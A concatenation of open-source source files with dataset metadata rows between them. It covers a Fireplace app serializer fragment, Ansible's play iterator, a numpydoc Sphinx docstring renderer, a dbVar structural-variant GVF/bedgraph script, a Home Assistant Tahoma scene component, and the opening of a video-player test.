'device_types', 'file_size', 'homepage', 'hosted_url',
'icons', 'id', 'is_offline', 'is_packaged', 'last_updated',
'manifest_url', 'name', 'payment_required', 'premium_type',
'previews', 'price', 'price_locale', 'privacy_policy',
'promo_imgs', 'public_stats', 'release_notes', 'ratings',
'slug', 'status', 'support_email', 'support_url', 'tags',
'upsell', 'user']
exclude = []
class FireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
class Meta(SimpleESAppSerializer.Meta):
fields = FireplaceAppSerializer.Meta.fields
exclude = FireplaceAppSerializer.Meta.exclude
def get_user_info(self, app):
# Fireplace search should always be anonymous for extra-cacheability.
return None
class FeedFireplaceESAppSerializer(BaseFireplaceAppSerializer,
SimpleESAppSerializer):
"""
Serializer for Fireplace Feed pages (mostly detail pages). Needs
collection groups.
"""
class Meta(SimpleESAppSerializer.Meta):
fields = sorted(FireplaceAppSerializer.Meta.fields + ['group'])
exclude = FireplaceAppSerializer.Meta.exclude
class BaseFireplaceWebsiteSerializer(serializers.Serializer):
slug = serializers.SerializerMethodField('get_slug')
def get_slug(self, obj):
        # Fake slug to help fireplace. Because of the {} characters, this
        # slug can never collide with a real app slug.
return '{website-%s}' % obj.id
def get_icons(self, obj):
# Fireplace only requires 64px and 128px icons.
return {
64: obj.get_icon_url(64),
128: obj.get_icon_url(128)
}
class FireplaceWebsiteSerializer(BaseFireplaceWebsiteSerializer,
WebsiteSerializer):
class Meta(WebsiteSerializer.Meta):
fields = ['categories', 'description', 'device_types', 'icons', 'id',
'keywords', 'mobile_url', 'name', 'promo_imgs', 'short_name',
'slug', 'url']
class FireplaceESWebsiteSerializer(BaseFireplaceWebsiteSerializer,
ESWebsiteSerializer):
class Meta(ESWebsiteSerializer.Meta):
fields = FireplaceWebsiteSerializer.Meta.fields
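# --- Illustrative sketch (not part of the original module) -------------------
# BaseFireplaceWebsiteSerializer.get_slug() above emits a fake
# '{website-<id>}' slug so Fireplace can tell website results apart from app
# results (per the comment there, the curly braces make such a slug impossible
# for a real app).  A consumer-side check could look like the helper below;
# its name is an assumption for illustration only.
def _example_split_slug(slug):
    """Return ('website', id) for fake website slugs, ('app', slug) otherwise."""
    import re
    match = re.match(r'^\{website-(\d+)\}$', slug)
    if match:
        return 'website', int(match.group(1))
    return 'app', slug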
| bsd-3-clause | -7,606,160,218,187,882,000 | 37.066667 | 79 | 0.639229 | false |
veger/ansible | lib/ansible/executor/play_iterator.py | 9 | 27180 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import fnmatch
from ansible import constants as C
from ansible.module_utils.six import iteritems
from ansible.module_utils.parsing.convert_bool import boolean
from ansible.playbook.block import Block
from ansible.playbook.task import Task
from ansible.utils.display import Display
display = Display()
__all__ = ['PlayIterator']
class HostState:
def __init__(self, blocks):
self._blocks = blocks[:]
self.cur_block = 0
self.cur_regular_task = 0
self.cur_rescue_task = 0
self.cur_always_task = 0
self.cur_dep_chain = None
self.run_state = PlayIterator.ITERATING_SETUP
self.fail_state = PlayIterator.FAILED_NONE
self.pending_setup = False
self.tasks_child_state = None
self.rescue_child_state = None
self.always_child_state = None
self.did_rescue = False
self.did_start_at_task = False
def __repr__(self):
return "HostState(%r)" % self._blocks
def __str__(self):
def _run_state_to_string(n):
states = ["ITERATING_SETUP", "ITERATING_TASKS", "ITERATING_RESCUE", "ITERATING_ALWAYS", "ITERATING_COMPLETE"]
try:
return states[n]
except IndexError:
return "UNKNOWN STATE"
def _failed_state_to_string(n):
states = {1: "FAILED_SETUP", 2: "FAILED_TASKS", 4: "FAILED_RESCUE", 8: "FAILED_ALWAYS"}
if n == 0:
return "FAILED_NONE"
else:
ret = []
for i in (1, 2, 4, 8):
if n & i:
ret.append(states[i])
return "|".join(ret)
return ("HOST STATE: block=%d, task=%d, rescue=%d, always=%d, run_state=%s, fail_state=%s, pending_setup=%s, tasks child state? (%s), "
"rescue child state? (%s), always child state? (%s), did rescue? %s, did start at task? %s" % (
self.cur_block,
self.cur_regular_task,
self.cur_rescue_task,
self.cur_always_task,
_run_state_to_string(self.run_state),
_failed_state_to_string(self.fail_state),
self.pending_setup,
self.tasks_child_state,
self.rescue_child_state,
self.always_child_state,
self.did_rescue,
self.did_start_at_task,
))
def __eq__(self, other):
if not isinstance(other, HostState):
return False
for attr in ('_blocks', 'cur_block', 'cur_regular_task', 'cur_rescue_task', 'cur_always_task',
'run_state', 'fail_state', 'pending_setup', 'cur_dep_chain',
'tasks_child_state', 'rescue_child_state', 'always_child_state'):
if getattr(self, attr) != getattr(other, attr):
return False
return True
def get_current_block(self):
return self._blocks[self.cur_block]
def copy(self):
new_state = HostState(self._blocks)
new_state.cur_block = self.cur_block
new_state.cur_regular_task = self.cur_regular_task
new_state.cur_rescue_task = self.cur_rescue_task
new_state.cur_always_task = self.cur_always_task
new_state.run_state = self.run_state
new_state.fail_state = self.fail_state
new_state.pending_setup = self.pending_setup
new_state.did_rescue = self.did_rescue
new_state.did_start_at_task = self.did_start_at_task
if self.cur_dep_chain is not None:
new_state.cur_dep_chain = self.cur_dep_chain[:]
if self.tasks_child_state is not None:
new_state.tasks_child_state = self.tasks_child_state.copy()
if self.rescue_child_state is not None:
new_state.rescue_child_state = self.rescue_child_state.copy()
if self.always_child_state is not None:
new_state.always_child_state = self.always_child_state.copy()
return new_state
class PlayIterator:
# the primary running states for the play iteration
ITERATING_SETUP = 0
ITERATING_TASKS = 1
ITERATING_RESCUE = 2
ITERATING_ALWAYS = 3
ITERATING_COMPLETE = 4
# the failure states for the play iteration, which are powers
# of 2 as they may be or'ed together in certain circumstances
FAILED_NONE = 0
FAILED_SETUP = 1
FAILED_TASKS = 2
FAILED_RESCUE = 4
FAILED_ALWAYS = 8
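    # Failure states combine with bitwise OR; for example a host that failed
    # its tasks and then also failed the rescue section carries
    # fail_state == FAILED_TASKS | FAILED_RESCUE (== 6), which is why the
    # checks below test flags with `fail_state & FAILED_RESCUE` rather than
    # comparing for equality.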
def __init__(self, inventory, play, play_context, variable_manager, all_vars, start_at_done=False):
self._play = play
self._blocks = []
self._variable_manager = variable_manager
# Default options to gather
gather_subset = play_context.gather_subset
gather_timeout = play_context.gather_timeout
fact_path = play_context.fact_path
# Retrieve subset to gather
if self._play.gather_subset is not None:
gather_subset = self._play.gather_subset
# Retrieve timeout for gather
if self._play.gather_timeout is not None:
gather_timeout = self._play.gather_timeout
# Retrieve fact_path
if self._play.fact_path is not None:
fact_path = self._play.fact_path
setup_block = Block(play=self._play)
# Gathering facts with run_once would copy the facts from one host to
# the others.
setup_block.run_once = False
setup_task = Task(block=setup_block)
setup_task.action = 'setup'
setup_task.name = 'Gathering Facts'
setup_task.args = {
'gather_subset': gather_subset,
}
# Unless play is specifically tagged, gathering should 'always' run
if not self._play.tags:
setup_task.tags = ['always']
if gather_timeout:
setup_task.args['gather_timeout'] = gather_timeout
if fact_path:
setup_task.args['fact_path'] = fact_path
setup_task.set_loader(self._play._loader)
# short circuit fact gathering if the entire playbook is conditional
if self._play._included_conditional is not None:
setup_task.when = self._play._included_conditional[:]
setup_block.block = [setup_task]
setup_block = setup_block.filter_tagged_tasks(play_context, all_vars)
self._blocks.append(setup_block)
self.cache_block_tasks(setup_block)
for block in self._play.compile():
new_block = block.filter_tagged_tasks(play_context, all_vars)
if new_block.has_tasks():
self.cache_block_tasks(new_block)
self._blocks.append(new_block)
for handler_block in self._play.handlers:
self.cache_block_tasks(handler_block)
self._host_states = {}
start_at_matched = False
batch = inventory.get_hosts(self._play.hosts)
self.batch_size = len(batch)
for host in batch:
self._host_states[host.name] = HostState(blocks=self._blocks)
# if we're looking to start at a specific task, iterate through
# the tasks for this host until we find the specified task
if play_context.start_at_task is not None and not start_at_done:
while True:
(s, task) = self.get_next_task_for_host(host, peek=True)
if s.run_state == self.ITERATING_COMPLETE:
break
if task.name == play_context.start_at_task or fnmatch.fnmatch(task.name, play_context.start_at_task) or \
task.get_name() == play_context.start_at_task or fnmatch.fnmatch(task.get_name(), play_context.start_at_task):
start_at_matched = True
break
else:
self.get_next_task_for_host(host)
# finally, reset the host's state to ITERATING_SETUP
if start_at_matched:
self._host_states[host.name].did_start_at_task = True
self._host_states[host.name].run_state = self.ITERATING_SETUP
if start_at_matched:
# we have our match, so clear the start_at_task field on the
# play context to flag that we've started at a task (and future
# plays won't try to advance)
play_context.start_at_task = None
def get_host_state(self, host):
# Since we're using the PlayIterator to carry forward failed hosts,
# in the event that a previous host was not in the current inventory
# we create a stub state for it now
if host.name not in self._host_states:
self._host_states[host.name] = HostState(blocks=[])
return self._host_states[host.name].copy()
def cache_block_tasks(self, block):
# now a noop, we've changed the way we do caching and finding of
# original task entries, but just in case any 3rd party strategies
# are using this we're leaving it here for now
return
def get_next_task_for_host(self, host, peek=False):
display.debug("getting the next task for host %s" % host.name)
s = self.get_host_state(host)
task = None
if s.run_state == self.ITERATING_COMPLETE:
display.debug("host %s is done iterating, returning" % host.name)
return (s, None)
(s, task) = self._get_next_task_from_state(s, host=host, peek=peek)
if not peek:
self._host_states[host.name] = s
display.debug("done getting next task for host %s" % host.name)
display.debug(" ^ task is: %s" % task)
display.debug(" ^ state is: %s" % s)
return (s, task)
def _get_next_task_from_state(self, state, host, peek, in_child=False):
task = None
# try and find the next task, given the current state.
while True:
# try to get the current block from the list of blocks, and
# if we run past the end of the list we know we're done with
# this block
try:
block = state._blocks[state.cur_block]
except IndexError:
state.run_state = self.ITERATING_COMPLETE
return (state, None)
if state.run_state == self.ITERATING_SETUP:
# First, we check to see if we were pending setup. If not, this is
# the first trip through ITERATING_SETUP, so we set the pending_setup
# flag and try to determine if we do in fact want to gather facts for
# the specified host.
if not state.pending_setup:
state.pending_setup = True
# Gather facts if the default is 'smart' and we have not yet
# done it for this host; or if 'explicit' and the play sets
# gather_facts to True; or if 'implicit' and the play does
# NOT explicitly set gather_facts to False.
gathering = C.DEFAULT_GATHERING
implied = self._play.gather_facts is None or boolean(self._play.gather_facts, strict=False)
if (gathering == 'implicit' and implied) or \
(gathering == 'explicit' and boolean(self._play.gather_facts, strict=False)) or \
(gathering == 'smart' and implied and not (self._variable_manager._fact_cache.get(host.name, {}).get('module_setup', False))):
# The setup block is always self._blocks[0], as we inject it
# during the play compilation in __init__ above.
setup_block = self._blocks[0]
if setup_block.has_tasks() and len(setup_block.block) > 0:
task = setup_block.block[0]
else:
# This is the second trip through ITERATING_SETUP, so we clear
# the flag and move onto the next block in the list while setting
# the run state to ITERATING_TASKS
state.pending_setup = False
state.run_state = self.ITERATING_TASKS
if not state.did_start_at_task:
state.cur_block += 1
state.cur_regular_task = 0
state.cur_rescue_task = 0
state.cur_always_task = 0
state.child_state = None
elif state.run_state == self.ITERATING_TASKS:
# clear the pending setup flag, since we're past that and it didn't fail
if state.pending_setup:
state.pending_setup = False
# First, we check for a child task state that is not failed, and if we
# have one recurse into it for the next task. If we're done with the child
# state, we clear it and drop back to getting the next task from the list.
if state.tasks_child_state:
(state.tasks_child_state, task) = self._get_next_task_from_state(state.tasks_child_state, host=host, peek=peek, in_child=True)
if self._check_failed_state(state.tasks_child_state):
# failed child state, so clear it and move into the rescue portion
state.tasks_child_state = None
self._set_failed_state(state)
else:
# get the next task recursively
if task is None or state.tasks_child_state.run_state == self.ITERATING_COMPLETE:
# we're done with the child state, so clear it and continue
# back to the top of the loop to get the next task
state.tasks_child_state = None
continue
else:
# First here, we check to see if we've failed anywhere down the chain
# of states we have, and if so we move onto the rescue portion. Otherwise,
# we check to see if we've moved past the end of the list of tasks. If so,
# we move into the always portion of the block, otherwise we get the next
# task from the list.
if self._check_failed_state(state):
state.run_state = self.ITERATING_RESCUE
elif state.cur_regular_task >= len(block.block):
state.run_state = self.ITERATING_ALWAYS
else:
task = block.block[state.cur_regular_task]
# if the current task is actually a child block, create a child
# state for us to recurse into on the next pass
if isinstance(task, Block) or state.tasks_child_state is not None:
state.tasks_child_state = HostState(blocks=[task])
state.tasks_child_state.run_state = self.ITERATING_TASKS
# since we've created the child state, clear the task
# so we can pick up the child state on the next pass
task = None
state.cur_regular_task += 1
elif state.run_state == self.ITERATING_RESCUE:
# The process here is identical to ITERATING_TASKS, except instead
# we move into the always portion of the block.
if host.name in self._play._removed_hosts:
self._play._removed_hosts.remove(host.name)
if state.rescue_child_state:
(state.rescue_child_state, task) = self._get_next_task_from_state(state.rescue_child_state, host=host, peek=peek, in_child=True)
if self._check_failed_state(state.rescue_child_state):
state.rescue_child_state = None
self._set_failed_state(state)
else:
if task is None or state.rescue_child_state.run_state == self.ITERATING_COMPLETE:
state.rescue_child_state = None
continue
else:
if state.fail_state & self.FAILED_RESCUE == self.FAILED_RESCUE:
state.run_state = self.ITERATING_ALWAYS
elif state.cur_rescue_task >= len(block.rescue):
if len(block.rescue) > 0:
state.fail_state = self.FAILED_NONE
state.run_state = self.ITERATING_ALWAYS
state.did_rescue = True
else:
task = block.rescue[state.cur_rescue_task]
if isinstance(task, Block) or state.rescue_child_state is not None:
state.rescue_child_state = HostState(blocks=[task])
state.rescue_child_state.run_state = self.ITERATING_TASKS
task = None
state.cur_rescue_task += 1
elif state.run_state == self.ITERATING_ALWAYS:
# And again, the process here is identical to ITERATING_TASKS, except
# instead we either move onto the next block in the list, or we set the
# run state to ITERATING_COMPLETE in the event of any errors, or when we
# have hit the end of the list of blocks.
if state.always_child_state:
(state.always_child_state, task) = self._get_next_task_from_state(state.always_child_state, host=host, peek=peek, in_child=True)
if self._check_failed_state(state.always_child_state):
state.always_child_state = None
self._set_failed_state(state)
else:
if task is None or state.always_child_state.run_state == self.ITERATING_COMPLETE:
state.always_child_state = None
continue
else:
if state.cur_always_task >= len(block.always):
if state.fail_state != self.FAILED_NONE:
state.run_state = self.ITERATING_COMPLETE
else:
state.cur_block += 1
state.cur_regular_task = 0
state.cur_rescue_task = 0
state.cur_always_task = 0
state.run_state = self.ITERATING_TASKS
state.tasks_child_state = None
state.rescue_child_state = None
state.always_child_state = None
state.did_rescue = False
# we're advancing blocks, so if this was an end-of-role block we
# mark the current role complete
if block._eor and host.name in block._role._had_task_run and not in_child and not peek:
block._role._completed[host.name] = True
else:
task = block.always[state.cur_always_task]
if isinstance(task, Block) or state.always_child_state is not None:
state.always_child_state = HostState(blocks=[task])
state.always_child_state.run_state = self.ITERATING_TASKS
task = None
state.cur_always_task += 1
elif state.run_state == self.ITERATING_COMPLETE:
return (state, None)
# if something above set the task, break out of the loop now
if task:
break
return (state, task)
def _set_failed_state(self, state):
if state.run_state == self.ITERATING_SETUP:
state.fail_state |= self.FAILED_SETUP
state.run_state = self.ITERATING_COMPLETE
elif state.run_state == self.ITERATING_TASKS:
if state.tasks_child_state is not None:
state.tasks_child_state = self._set_failed_state(state.tasks_child_state)
else:
state.fail_state |= self.FAILED_TASKS
if state._blocks[state.cur_block].rescue:
state.run_state = self.ITERATING_RESCUE
elif state._blocks[state.cur_block].always:
state.run_state = self.ITERATING_ALWAYS
else:
state.run_state = self.ITERATING_COMPLETE
elif state.run_state == self.ITERATING_RESCUE:
if state.rescue_child_state is not None:
state.rescue_child_state = self._set_failed_state(state.rescue_child_state)
else:
state.fail_state |= self.FAILED_RESCUE
if state._blocks[state.cur_block].always:
state.run_state = self.ITERATING_ALWAYS
else:
state.run_state = self.ITERATING_COMPLETE
elif state.run_state == self.ITERATING_ALWAYS:
if state.always_child_state is not None:
state.always_child_state = self._set_failed_state(state.always_child_state)
else:
state.fail_state |= self.FAILED_ALWAYS
state.run_state = self.ITERATING_COMPLETE
return state
def mark_host_failed(self, host):
s = self.get_host_state(host)
display.debug("marking host %s failed, current state: %s" % (host, s))
s = self._set_failed_state(s)
display.debug("^ failed state is now: %s" % s)
self._host_states[host.name] = s
self._play._removed_hosts.append(host.name)
def get_failed_hosts(self):
return dict((host, True) for (host, state) in iteritems(self._host_states) if self._check_failed_state(state))
def _check_failed_state(self, state):
if state is None:
return False
elif state.run_state == self.ITERATING_RESCUE and self._check_failed_state(state.rescue_child_state):
return True
elif state.run_state == self.ITERATING_ALWAYS and self._check_failed_state(state.always_child_state):
return True
elif state.fail_state != self.FAILED_NONE:
if state.run_state == self.ITERATING_RESCUE and state.fail_state & self.FAILED_RESCUE == 0:
return False
elif state.run_state == self.ITERATING_ALWAYS and state.fail_state & self.FAILED_ALWAYS == 0:
return False
else:
return not state.did_rescue
elif state.run_state == self.ITERATING_TASKS and self._check_failed_state(state.tasks_child_state):
cur_block = self._blocks[state.cur_block]
if len(cur_block.rescue) > 0 and state.fail_state & self.FAILED_RESCUE == 0:
return False
else:
return True
return False
def is_failed(self, host):
s = self.get_host_state(host)
return self._check_failed_state(s)
def get_active_state(self, state):
'''
Finds the active state, recursively if necessary when there are child states.
'''
if state.run_state == self.ITERATING_TASKS and state.tasks_child_state is not None:
return self.get_active_state(state.tasks_child_state)
elif state.run_state == self.ITERATING_RESCUE and state.rescue_child_state is not None:
return self.get_active_state(state.rescue_child_state)
elif state.run_state == self.ITERATING_ALWAYS and state.always_child_state is not None:
return self.get_active_state(state.always_child_state)
return state
def get_original_task(self, host, task):
# now a noop because we've changed the way we do caching
return (None, None)
def _insert_tasks_into_state(self, state, task_list):
# if we've failed at all, or if the task list is empty, just return the current state
if state.fail_state != self.FAILED_NONE and state.run_state not in (self.ITERATING_RESCUE, self.ITERATING_ALWAYS) or not task_list:
return state
if state.run_state == self.ITERATING_TASKS:
if state.tasks_child_state:
state.tasks_child_state = self._insert_tasks_into_state(state.tasks_child_state, task_list)
else:
target_block = state._blocks[state.cur_block].copy()
before = target_block.block[:state.cur_regular_task]
after = target_block.block[state.cur_regular_task:]
target_block.block = before + task_list + after
state._blocks[state.cur_block] = target_block
elif state.run_state == self.ITERATING_RESCUE:
if state.rescue_child_state:
state.rescue_child_state = self._insert_tasks_into_state(state.rescue_child_state, task_list)
else:
target_block = state._blocks[state.cur_block].copy()
before = target_block.rescue[:state.cur_rescue_task]
after = target_block.rescue[state.cur_rescue_task:]
target_block.rescue = before + task_list + after
state._blocks[state.cur_block] = target_block
elif state.run_state == self.ITERATING_ALWAYS:
if state.always_child_state:
state.always_child_state = self._insert_tasks_into_state(state.always_child_state, task_list)
else:
target_block = state._blocks[state.cur_block].copy()
before = target_block.always[:state.cur_always_task]
after = target_block.always[state.cur_always_task:]
target_block.always = before + task_list + after
state._blocks[state.cur_block] = target_block
return state
def add_tasks(self, host, task_list):
self._host_states[host.name] = self._insert_tasks_into_state(self.get_host_state(host), task_list)
| gpl-3.0 | -2,962,201,180,798,236,000 | 46.768014 | 149 | 0.563355 | false |
wadetb/tinynumpy | docs/ext/docscrape_sphinx.py | 9 | 7751 | import re
import inspect
import textwrap
import pydoc
import sphinx
from docscrape import NumpyDocString, FunctionDoc, ClassDoc
class SphinxDocString(NumpyDocString):
def __init__(self, docstring, config={}):
self.use_plots = config.get('use_plots', False)
NumpyDocString.__init__(self, docstring, config=config)
# string conversion routines
def _str_header(self, name, symbol='`'):
return ['.. rubric:: ' + name, '']
def _str_field_list(self, name):
return [':' + name + ':']
def _str_indent(self, doc, indent=4):
out = []
for line in doc:
out += [' ' * indent + line]
return out
def _str_signature(self):
return ['']
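        # The unconditional return above disables signature rendering; the
        # branch below is unreachable as written.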
if self['Signature']:
return ['``%s``' % self['Signature']] + ['']
else:
return ['']
def _str_summary(self):
return self['Summary'] + ['']
def _str_extended_summary(self):
return self['Extended Summary'] + ['']
def _str_param_list(self, name):
out = []
if self[name]:
out += self._str_field_list(name)
out += ['']
for param, param_type, desc in self[name]:
out += self._str_indent(['**%s** : %s' % (param.strip(),
param_type)])
out += ['']
out += self._str_indent(desc, 8)
out += ['']
return out
@property
def _obj(self):
if hasattr(self, '_cls'):
return self._cls
elif hasattr(self, '_f'):
return self._f
return None
def _str_member_list(self, name):
"""
Generate a member listing, autosummary:: table where possible,
and a table where not.
"""
out = []
if self[name]:
out += ['.. rubric:: %s' % name, '']
prefix = getattr(self, '_name', '')
if prefix:
prefix = '~%s.' % prefix
autosum = []
others = []
for param, param_type, desc in self[name]:
param = param.strip()
if not self._obj or hasattr(self._obj, param):
autosum += [" %s%s" % (prefix, param)]
else:
others.append((param, param_type, desc))
if False and autosum:
out += ['.. autosummary::', ' :toctree:', '']
out += autosum
if others:
maxlen_0 = max([len(x[0]) for x in others])
maxlen_1 = max([len(x[1]) for x in others])
hdr = "=" * maxlen_0 + " " + "=" * maxlen_1 + " " + "=" * 10
fmt = '%%%ds %%%ds ' % (maxlen_0, maxlen_1)
n_indent = maxlen_0 + maxlen_1 + 4
out += [hdr]
for param, param_type, desc in others:
out += [fmt % (param.strip(), param_type)]
out += self._str_indent(desc, n_indent)
out += [hdr]
out += ['']
return out
def _str_section(self, name):
out = []
if self[name]:
out += self._str_header(name)
out += ['']
content = textwrap.dedent("\n".join(self[name])).split("\n")
out += content
out += ['']
return out
def _str_see_also(self, func_role):
out = []
if self['See Also']:
see_also = super(SphinxDocString, self)._str_see_also(func_role)
out = ['.. seealso::', '']
out += self._str_indent(see_also[2:])
return out
def _str_warnings(self):
out = []
if self['Warnings']:
out = ['.. warning::', '']
out += self._str_indent(self['Warnings'])
return out
def _str_index(self):
idx = self['index']
out = []
if len(idx) == 0:
return out
out += ['.. index:: %s' % idx.get('default', '')]
for section, references in idx.items():
if section == 'default':
continue
elif section == 'refguide':
out += [' single: %s' % (', '.join(references))]
else:
out += [' %s: %s' % (section, ','.join(references))]
return out
def _str_references(self):
out = []
if self['References']:
out += self._str_header('References')
if isinstance(self['References'], str):
self['References'] = [self['References']]
out.extend(self['References'])
out += ['']
# Latex collects all references to a separate bibliography,
# so we need to insert links to it
if sphinx.__version__ >= "0.6":
out += ['.. only:: latex', '']
else:
out += ['.. latexonly::', '']
items = []
for line in self['References']:
m = re.match(r'.. \[([a-z0-9._-]+)\]', line, re.I)
if m:
items.append(m.group(1))
out += [' ' + ", ".join(["[%s]_" % item for item in items]), '']
return out
def _str_examples(self):
examples_str = "\n".join(self['Examples'])
if (self.use_plots and 'import matplotlib' in examples_str
and 'plot::' not in examples_str):
out = []
out += self._str_header('Examples')
out += ['.. plot::', '']
out += self._str_indent(self['Examples'])
out += ['']
return out
else:
return self._str_section('Examples')
def __str__(self, indent=0, func_role="obj"):
out = []
out += self._str_signature()
out += self._str_index() + ['']
out += self._str_summary()
out += self._str_extended_summary()
for param_list in ('Parameters', 'Returns', 'Raises'):
out += self._str_param_list(param_list)
out += self._str_warnings()
out += self._str_see_also(func_role)
out += self._str_section('Notes')
out += self._str_references()
out += self._str_examples()
for param_list in ('Attributes', 'Methods'):
out += self._str_member_list(param_list)
out = self._str_indent(out, indent)
return '\n'.join(out)
class SphinxFunctionDoc(SphinxDocString, FunctionDoc):
def __init__(self, obj, doc=None, config={}):
self.use_plots = config.get('use_plots', False)
FunctionDoc.__init__(self, obj, doc=doc, config=config)
class SphinxClassDoc(SphinxDocString, ClassDoc):
def __init__(self, obj, doc=None, func_doc=None, config={}):
self.use_plots = config.get('use_plots', False)
ClassDoc.__init__(self, obj, doc=doc, func_doc=None, config=config)
class SphinxObjDoc(SphinxDocString):
def __init__(self, obj, doc=None, config={}):
self._f = obj
SphinxDocString.__init__(self, doc, config=config)
def get_doc_object(obj, what=None, doc=None, config={}):
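    # Dispatch on the kind of object: classes yield SphinxClassDoc, other
    # callables SphinxFunctionDoc, and everything else a SphinxObjDoc built
    # from pydoc.getdoc(obj); str() of the result is the reST-formatted
    # docstring.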
if what is None:
if inspect.isclass(obj):
what = 'class'
elif inspect.ismodule(obj):
what = 'module'
elif callable(obj):
what = 'function'
else:
what = 'object'
if what == 'class':
return SphinxClassDoc(obj, func_doc=SphinxFunctionDoc, doc=doc,
config=config)
elif what in ('function', 'method'):
return SphinxFunctionDoc(obj, doc=doc, config=config)
else:
if doc is None:
doc = pydoc.getdoc(obj)
return SphinxObjDoc(obj, doc, config=config)
| mit | -3,323,854,367,741,622,000 | 31.567227 | 78 | 0.475164 | false |
NCBI-Hackathons/Structural_Variant_Comparison | py/make_gvf_and_bedgraph.py | 1 | 4465 | #!/bin/bash
# Authors: Yan Kai, Jeffery Hsu
# GRCh38
import sys,re,os
from optparse import OptionParser
import pandas as pd
import HTSeq
def inner_outer_pref(line, suffix):
'''
    Preference order: inner_ + suffix -> suffix -> outer_ + suffix
    (the first non-null column wins).
'''
prefix = ['inner_', '', 'outer_']
test = [i + suffix for i in prefix]
for i in test:
if(not pd.isnull(line[i])):
out = int(line[i])
return(out)
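# Illustration (column names follow the dbVar tab layout assumed by this
# script): for a row with inner_start=120 and outer_start=100 but a null
# plain 'start', inner_outer_pref(row, 'start') returns 120, because the
# 'inner_' column is tested first.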
def VariantCallTabReader(filepath, chrom_size):
"""
    This function reads the variant calls from the merged studies, which
    contain various variant types.
"""
infile = pd.read_csv(filepath, sep="\t")
# var_types is a dic keyed by var_type and valued by a list of genomic intervals
var_types_ga = {}
var_types_id = {}
for _, line in infile.iterrows():
var_type = str(line['var_type'])
var_type = var_type.replace(" ","_")
if var_type not in var_types_ga.keys():
var_types_ga[var_type] = []
var_types_id[var_type] = []
chrom = 'chr'+ str(line['chr'])
accesion = line[0]
if (chrom in chrom_size.keys()):
start = inner_outer_pref(line, 'start')
end = inner_outer_pref(line, 'stop')
# Create a 'Genomic interval' from this variant call
iv = HTSeq.GenomicInterval(chrom, start, end, ".")
var_types_ga[var_type].append(iv)
var_types_id[var_type].append(accesion)
return((var_types_ga,var_types_id))
def write_to_gvf(ga,nssd, var_type, outfile):
"""
    ga is the genomic array of per-interval counts; nssd is the
    GenomicArrayOfSets holding the contributing SSV accession ids.
"""
outfile = open(outfile, 'w')
ivs = list(ga.steps())
ids = list(nssd.steps())
num_iv = len(ivs)
outline = '##gvf-version 1.00\n'
outfile.write(outline)
source = 'dbVar'
score = '.'
strand = '.'
phase = '.'
for i in xrange(num_iv):
chrom = ivs[i][0].chrom
start = ivs[i][0].start+1
end = ivs[i][0].end
ID = str(i+1)
count = ivs[i][1]
SSV = ids[i][1]
attributes = 'ID='+ID+';'+'count='+str(count)+';'+'SSV='+str(SSV)
outline =chrom+'\t'+source+'\t'+var_type+'\t'+str(start)+'\t'+str(end)+'\t'+score+'\t'+strand+'\t'+phase+'\t'+attributes+'\n'
outfile.write(outline)
outfile.close()
def main(argv):
parser = OptionParser()
parser.add_option("-r", "--chromsize", action="store", type="string", dest="chromsize", help="GRCh38 chromosome size file", metavar="<str>")
parser.add_option("-v", "--variantfile", action="store", type="string", dest="variantfile", metavar="<file>", help="the variant calls files in a specific format")
parser.add_option("-o", "--outdir", action="store", type="string", dest="outdir", metavar="<file>", help="the directory to store the output files")
(opt, args) = parser.parse_args(argv)
if len(argv) < 6:
parser.print_help()
sys.exit(1)
chrom_size_file = open(opt.chromsize,'r')
# Read chrom size information from the chrom_size_file.
chrom_size = {}
for line in chrom_size_file:
pline = line.strip()
sline = pline.split('\t')
chrom_size[sline[1]] = int(sline[0])
chrom_size_file.close()
    var_types_ga, var_types_id = VariantCallTabReader(opt.variantfile, chrom_size)
for var_type in var_types_ga.keys():
        # Create a 'Genomic Array' using the HTSeq package
ga = HTSeq.GenomicArray( chrom_size, stranded=False, typecode="i" )
nssd = HTSeq.GenomicArrayOfSets(chrom_size, stranded=False)
variant_interval = var_types_ga[var_type]
variant_id = var_types_id[var_type]
# Get the count of variant calls in each region
variant_num = len(variant_interval)
print "For "+var_type+", there are "+str(variant_num)+" variant calls from the clustersed studies..."
for i in xrange(variant_num):
iv = variant_interval[i]
try:
ga[iv] += 1
nssd[iv] += variant_id[i]
            except:
                # Skip intervals that HTSeq cannot index (e.g. zero-length intervals).
                pass
bedgraph = opt.outdir+'/'+var_type+'_dbVar.bedgraph'
ga.write_bedgraph_file(bedgraph, strand=".", track_options="")
gvf = opt.outdir+'/'+var_type+'_dbVar.gvf'
write_to_gvf(ga,nssd,var_type,gvf)
if __name__ == "__main__":
main(sys.argv)
| cc0-1.0 | 483,102,440,489,157,400 | 33.346154 | 166 | 0.576484 | false |
molobrakos/home-assistant | homeassistant/components/tahoma/scene.py | 7 | 1181 | """Support for Tahoma scenes."""
import logging
from homeassistant.components.scene import Scene
from . import DOMAIN as TAHOMA_DOMAIN
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Tahoma scenes."""
controller = hass.data[TAHOMA_DOMAIN]['controller']
scenes = []
for scene in hass.data[TAHOMA_DOMAIN]['scenes']:
scenes.append(TahomaScene(scene, controller))
add_entities(scenes, True)
class TahomaScene(Scene):
"""Representation of a Tahoma scene entity."""
def __init__(self, tahoma_scene, controller):
"""Initialize the scene."""
self.tahoma_scene = tahoma_scene
self.controller = controller
self._name = self.tahoma_scene.name
def activate(self):
"""Activate the scene."""
self.controller.launch_action_group(self.tahoma_scene.oid)
@property
def name(self):
"""Return the name of the scene."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the scene."""
return {'tahoma_scene_oid': self.tahoma_scene.oid}
| apache-2.0 | -8,298,200,972,585,649,000 | 27.804878 | 68 | 0.656224 | false |
spcui/tp-qemu | qemu/tests/rv_video.py | 5 | 2415 | """
rv_video.py - Starts the video player
The video is played in a loop; the kill_app test should usually be called
later to close Totem.
